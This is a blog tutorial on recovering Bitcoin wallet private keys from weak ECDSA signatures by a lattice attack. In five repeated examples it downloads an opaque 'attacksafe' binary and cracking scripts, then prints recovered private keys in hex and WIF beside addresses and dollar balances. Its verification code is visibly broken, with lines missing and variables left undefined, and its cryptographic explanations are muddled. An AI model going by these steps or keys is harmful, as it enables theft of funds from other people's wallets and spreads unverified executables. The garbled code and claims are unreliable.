# LATTICE ATTACK 249bits we solve the problem of hidden numbers using 79 signatures ECDSA

By CryptoDeep | CRYPTODEEP | 1 Oct 2023

CRYPTO DEEP TECH

In our earliest work, we published an article on the topic “LATTICE ATTACK” as a complete solution to the HNP [Hidden Number Problem] , but with the recent emergence of a new attack “POLYNONCE ATTACK” , we decided to supplement the article using 79 signatures ECDSA.

Based on the previous article, where we took the polynomial 128 bitsand with the actual increase in the number of signatures, we will bring the value of the polynomial to 249 bits.

All we need is to solve the problem of hidden numbers.

In this article, we will analyze five independent examples of cryptanalysis of the Bitcoin blockchain. All examples will be uploaded to the GitHub repository .

## “Lattice Attack on Bitcoin”

Consider an example with a Bitcoin Address:

19mJofzRwwwx4VmXuAXgX6pgM3qzJqi25z

6a941396b28a72ac834d922165995e6685a760f884dbb9e8b6dea95b01f0aae8

## RawTX

Let’s go to the official website:  https://colab.research.google.com

Download HEXthe data through the utility wget and save it to a file: RawTX.txt

!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example1/HEX.txt

Let’s run the code and get the bits we needRawTX

with open("HEX.txt") as myfile:

listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile)

f = open("RawTX.txt", 'w')
f.write("" + listfile + "" + "\n")
f.close()

To implement the attack, we will use the software

www.attacksafe.ru/software

## Access rights:

!chmod +x attacksafe

ls

## Application:

!./attacksafe -help

-version:  software version
-list:     list of bitcoin attacks
-tool:     indicate the attack
-gpu:      enable gpu
-time:     work timeout
-server:   server mode
-port:     server port
-open:     open file
-save:     save file
-search:   vulnerability search
-stop:     stop at mode
-max:      maximum quantity in mode
-min:      minimum quantity per mode
-speed:    boost speed for mode
-range:    specific range
-crack:    crack mode
-field:    starting field
-point:    starting point
-inject:   injection regimen
-decode:   decoding mode

!./attacksafe -version

Version 5.3.4. [ATTACKSAFE SOFTWARE, © 2023]

"ATTACKSAFE SOFTWARE" includes all popular attacks on Bitcoin.

## Let’s run a list of all attacks:

!./attacksafe -list

Let’s choose -tool: lattice_attack

To get a specific HEXvalue R,S,Zfor the signature ECDSA, we previously added data  RawTX through the utility echoto a text document and saved it as a file RawTX.txt

## Launch  -tool lattice_attack using software “ATTACKSAFE SOFTWARE”

!./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv

We launched this attack from  -tool lattice_attack and the result was saved to a file SignatureRSZ.csv

Now to see the successful result, open the file SignatureRSZ.csv

In order to calculate the private key to a Bitcoin Wallet from a file,  SignatureRSZ.csvwe will install SageMath

!wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2
!tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2

Let’s go through the directory:

cd SageMath/

ls

Run  relocate-once.py  with the command:Python-script:

!python3 relocate-once.py

Move "AttackSafe"to "SignatureRSZ.csv"folder"SageMath"

!mv '/content/attacksafe' '/content/SageMath/attacksafe'
!mv '/content/SignatureRSZ.csv' '/content/SageMath/SignatureRSZ.csv'

ls

!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/crack_weak_ECDSA_nonces_with_LLL.py

Now let’s run  SageMath the command:

!./sage -sh

To calculate the private key to the Bitcoin Wallet, run the script crack_weak_ECDSA_nonces_with_LLL.py specifying the parameters249 bits 79 sign

python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt

cat PrivateKey.txt

Let’s open the file:PrivateKey.txt

We received the private key to the Bitcoin Wallet in HEXthe format

PrivKey = 0x9a52a4dbcc148f1480a6fb5311252524fc498eb508c7cb8f63bbee4b9af37941

## Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

## Result:

We got 79 identical original bits from249

Thanks to the value on the secp256k1 curve from  Hal Finney,   LAMBDA and BETA revealed the same initial bits to us. The value POLYNONCEin the format HEXallows us to fully solve the problem of hidden numbers, get a private key and restore a Bitcoin Wallet.

## Let’s check the HEX of the private key:

Install the modulebitcoin

!pip3 install bitcoin

Let’s run the code:

from bitcoin import *

with open("PrivateKey.txt","r") as f:

content = [x.strip() for x in content]
f.close()

for x in content:

outfile.close()

9a52a4dbcc148f1480a6fb5311252524fc498eb508c7cb8f63bbee4b9af37941:19mJofzRwwwx4VmXuAXgX6pgM3qzJqi25z

WIF:  L2PhDrYZw6fWqeLZMnMeAXvxZ47MEnepaQVLL2EazbRhqesytoQB
HEX:  9a52a4dbcc148f1480a6fb5311252524fc498eb508c7cb8f63bbee4b9af37941

BALANCE: \$ 1015.58

## Let’s look at other examples:

2

Consider example #2 with a Bitcoin Address:

1GPZVDUyPM6qxCsJQrpJeo14WDRVLvTZ2Z

9130c5b8e92f37d3a58dcae16daa27625cc52b698a83af7c8b891f01bfa0b2af

## RawTX

Let’s remove the files from the first example:

!rm HEX.txt
!rm RawTX.txt
!rm NoncesHEX.txt
!rm PrivateKey.txt
!rm SignatureRSZ.csv

Download  HEXthe data through the utility  wget and save it to a file:  RawTX.txt

!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example2/HEX.txt

Let’s run the code and get the bits we need RawTX

with open("HEX.txt") as myfile:

listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile)

f = open("RawTX.txt", 'w')
f.write("" + listfile + "" + "\n")
f.close()

## Launch  -tool lattice_attack using software “ATTACKSAFE SOFTWARE”

!./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv

We launched this attack from  -tool lattice_attack and the result was saved to a file SignatureRSZ.csv

Now to see the successful result, open the file SignatureRSZ.csv

Let’s run  SageMath the command:

!./sage -sh

To calculate the private key to the Bitcoin Wallet, run the script  crack_weak_ECDSA_nonces_with_LLL.py  specifying the parameters 249 bits 79 sign

python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt

cat PrivateKey.txt

Let’s open the file: PrivateKey.txt

We received the private key to the Bitcoin Wallet in  HEX the format

PrivKey = 0x00db251a1ab7cfa7679dfe61271d0af4bb9c68595178cf4c9237478eab2dba1d

## Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

## Result:

We got 79 identical original bits from249

Thanks to the value on the secp256k1 curve from  Hal Finney,   LAMBDA and BETA revealed the same initial bits to us. The value POLYNONCEin the format HEXallows us to fully solve the problem of hidden numbers, get a private key and restore a Bitcoin Wallet.

## Let’s check the HEX of the private key:

Let’s run the code:

from bitcoin import *

with open("PrivateKey.txt","r") as f:

content = [x.strip() for x in content]
f.close()

for x in content:

outfile.close()

WIF:  KwFNhRPDpgD5X77T8x5oL628aHh9UtscwwrLjGBKE8NeLshYvAqC
HEX:  00db251a1ab7cfa7679dfe61271d0af4bb9c68595178cf4c9237478eab2dba1d

BALANCE: \$ 999.10

## Let’s look at other examples:

3

Consider example #3 with a Bitcoin Address:

18Y9nUpdtxAKTh6yaN299jfUxcpJ2ApHz

## RawTX

Let’s remove the files from the second example:

!rm HEX.txt
!rm RawTX.txt
!rm NoncesHEX.txt
!rm PrivateKey.txt
!rm SignatureRSZ.csv

Download  HEX the data through the utility  wget and save it to a file:  RawTX.txt

!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example3/HEX.txt

Let’s run the code and get the bits we need RawTX

with open("HEX.txt") as myfile:

listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile)

f = open("RawTX.txt", 'w')
f.write("" + listfile + "" + "\n")
f.close()

## Launch  -tool lattice_attack using software “ATTACKSAFE SOFTWARE”

!./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv

We launched this attack from  -tool lattice_attack and the result was saved to a file SignatureRSZ.csv

Now to see the successful result, open the file SignatureRSZ.csv

Let’s run  SageMath the command:

!./sage -sh

To calculate the private key to the Bitcoin Wallet, run the script  crack_weak_ECDSA_nonces_with_LLL.py  specifying the parameters 249 bits 79 sign

python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt

cat PrivateKey.txt

Let’s open the file: PrivateKey.txt

We received the private key to the Bitcoin Wallet in  HEX the format

PrivKey = 0x80e3052532356bc701189818c095fb8a7f035fd7a5a96777df4162205e945aa5

## Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

## Result:

We got 79 identical original bits from249

Thanks to the value on the secp256k1 curve from  Hal Finney,   LAMBDA and BETA revealed the same initial bits to us. The value POLYNONCEin the format HEXallows us to fully solve the problem of hidden numbers, get a private key and restore a Bitcoin Wallet.

## Let’s check the HEX of the private key:

Let’s run the code:

from bitcoin import *

with open("PrivateKey.txt","r") as f:

content = [x.strip() for x in content]
f.close()

for x in content:

outfile.close()

WIF:  L1YFTAP2X6jhi9W6ZVy2xX8H89TYwZcgSKcPLX7NmAx3n8PjqDkU
HEX:  80e3052532356bc701189818c095fb8a7f035fd7a5a96777df4162205e945aa5

BALANCE: \$ 1023.25

№4

Consider example #4 with a Bitcoin Address:

12fqNTJc1wj2xfNscYHAzehD6f6sRjWBor

6e6d84bc92cd79fba2d1eee5fb47e393896d44f666a50d4948a022751e3f0989

## RawTX

"hex": 01000000418ff67c7d3309211ab9d9629d97bbac7730d3cbb419df4ec43d2c5fc4f81bbefb1b0000006b4830450221008c223861acf1f265547eddb04a7cf98d206643a05824e56e97c70beddd18eaf20220139a34bf077a1fdb15e716d765955203e746616dfe8bf536b86d259b5c8a09b8012103c50b5619a40a23ff6a5510238405b8efd3f8f1bc442e1a415b25078b4cbd88e3ffffffff..............................

Let’s remove the files from the second example:

!rm HEX.txt
!rm RawTX.txt
!rm NoncesHEX.txt
!rm PrivateKey.txt
!rm SignatureRSZ.csv

!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example4/HEX.txt

Let’s run the code and get the bits we need RawTX

with open("HEX.txt") as myfile:

listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile)

f = open("RawTX.txt", 'w')
f.write("" + listfile + "" + "\n")
f.close()

## Launch  -tool lattice_attack using software “ATTACKSAFE SOFTWARE”

!./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv

We launched this attack from  -tool lattice_attack and the result was saved to a file SignatureRSZ.csv

Now to see the successful result, open the file SignatureRSZ.csv

Let’s run  SageMath the command:

!./sage -sh

To calculate the private key to the Bitcoin Wallet, run the script  crack_weak_ECDSA_nonces_with_LLL.py  specifying the parameters 249 bits 79 sign

python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt

cat PrivateKey.txt

Let’s open the file: PrivateKey.txt

We received the private key to the Bitcoin Wallet in  HEX the format

PrivKey = 0x9e636a4ef1a63c4bd385b8d26d29f6394a29963f12109dbf34fef74377866a32

## Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

## Result:

We got 79 identical original bits from249

Thanks to the value on the secp256k1 curve from  Hal Finney,   LAMBDA and BETA revealed the same initial bits to us. The value POLYNONCEin the format HEXallows us to fully solve the problem of hidden numbers, get a private key and restore a Bitcoin Wallet.

## Let’s check the HEX of the private key:

Let’s run the code:

from bitcoin import *

with open("PrivateKey.txt","r") as f:

content = [x.strip() for x in content]
f.close()

for x in content:

outfile.close()

WIF:  L2Xbaxg8QFoLn5URp7GKMyLwEN9dV5TtgpdbXYo7WDJsHZLcT898
HEX:  9e636a4ef1a63c4bd385b8d26d29f6394a29963f12109dbf34fef74377866a32

BALANCE: \$ 406.03

## №5

Consider example #5 with a Bitcoin Address:

1L8v5aUZRzYbGKWcj9Yt6mGdd95Sy9bXjN

## RawTX

Let’s remove the files from the second example:

!rm HEX.txt
!rm RawTX.txt
!rm NoncesHEX.txt
!rm PrivateKey.txt
!rm SignatureRSZ.csv

Download  HEXthe data through the utility  wget and save it to a file:  RawTX.txt

!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/21LatticeAttack/example5/HEX.txt

Let’s run the code and get the bits we need RawTX

with open("HEX.txt") as myfile:

listfile="\n".join(f'{line.rstrip()[:+298]}' for line in myfile)

f = open("RawTX.txt", 'w')
f.write("" + listfile + "" + "\n")
f.close()

## Launch  -tool lattice_attack using software “ATTACKSAFE SOFTWARE”

!./attacksafe -tool lattice_attack -open RawTX.txt -save SignatureRSZ.csv

We launched this attack from  -tool lattice_attack and the result was saved to a file SignatureRSZ.csv

Now to see the successful result, open the file SignatureRSZ.csv

Let’s run  SageMath the command:

!./sage -sh

To calculate the private key to the Bitcoin Wallet, run the script  crack_weak_ECDSA_nonces_with_LLL.py  specifying the parameters 249 bits 79 sign

python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 249 79 > PrivateKey.txt

cat PrivateKey.txt

Let’s open the file: PrivateKey.txt

We received the private key to the Bitcoin Wallet in  HEX the format

## Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

## Result:

We got 79 identical original bits from249

Thanks to the value on the secp256k1 curve from  Hal Finney,   LAMBDA and BETA revealed the same initial bits to us. The value POLYNONCEin the format HEXallows us to fully solve the problem of hidden numbers, get a private key and restore a Bitcoin Wallet.

## Let’s check the HEX of the private key:

Let’s run the code:

from bitcoin import *

with open("PrivateKey.txt","r") as f:

content = [x.strip() for x in content]
f.close()

for x in content:

outfile.close()

WIF:  L4porgUmuBkMbATA6Pp7r8uqShFt2zTPNEfuPNYi1BCym4hhV8gs

BALANCE: \$ 995.39

BALANCE: \$ 995.39

## Literature:

Source

ATTACKSAFE SOFTWARE

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/CzaHitewN-4

Source: https://cryptodeeptech.ru/lattice-attack-249bits

CryptoDeep

Financial security of data and secp256k1 elliptic curve cryptography against weak ECDSA signatures in BITCOIN cryptocurrency

CRYPTODEEP

Financial security of data and secp256k1 elliptic curve cryptography against weak ECDSA signatures in BITCOIN cryptocurrency [email protected] - Email for all questions. The creators of the software are not responsible for the use of materials Donation Address: ♥ BTC: 1Lw2gTnMpxRUNBU85Hg4ruTwnpUPKdf3nV ♥ETH: 0xaBd66CF90898517573f19184b3297d651f7b90bf ♥ YooMoney.ru/to/410011415370470

Send a \$0.01 microtip in crypto to the author, and earn yourself as you read!

20% to author / 80% to me.
We pay the tips from our rewards pool.